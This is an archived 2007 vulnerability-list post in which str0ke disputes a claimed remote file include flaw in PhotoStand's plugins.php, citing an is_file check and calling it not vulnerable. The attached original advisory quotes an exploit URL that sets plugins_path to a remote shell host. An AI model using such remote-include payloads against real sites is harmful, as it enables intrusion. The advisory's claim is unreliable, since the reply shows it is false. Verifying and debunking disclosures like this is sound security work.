[VIM] false: PhotoStand (plugins.php) Remote File Include Vuln.
str0ke
str0ke at milw0rm.com
Wed Feb 7 09:54:23 EST 2007
line: 18 if(is_file($plugins_path . "plugins/" . $plugin ."/plugin.php")
line: 20 include($plugins_path . "plugins/" . $plugin ."/plugin.php");
Not vulnerable.
/str0ke
-------------- next part --------------
################################################################################################
#
# Title : PhotoStand (plugins.php) Remote File Include Vuln.
# Author : Gokhan
# DownLoad : http://www.comscripts.com/jump.php?action=script&id=1864
# Contact : gokhankaya at hotmail.com | msn at bl4ster.net
#
# Vuln Code : includes/functions/plugins.php
#
# include($plugins_path . "plugins/" . $plugin ."/plugin.php");
#
# Exploit :
http://site/path/includes/functions/plugins.php?plugins_path=http://sh3ll
#
################################################################################################
#
# GreetZ: BLaCKWHITE, CanberX, LGMAN, HackerBox.Eu, str0ke
#
#################################################################################################
More information about the VIM
mailing list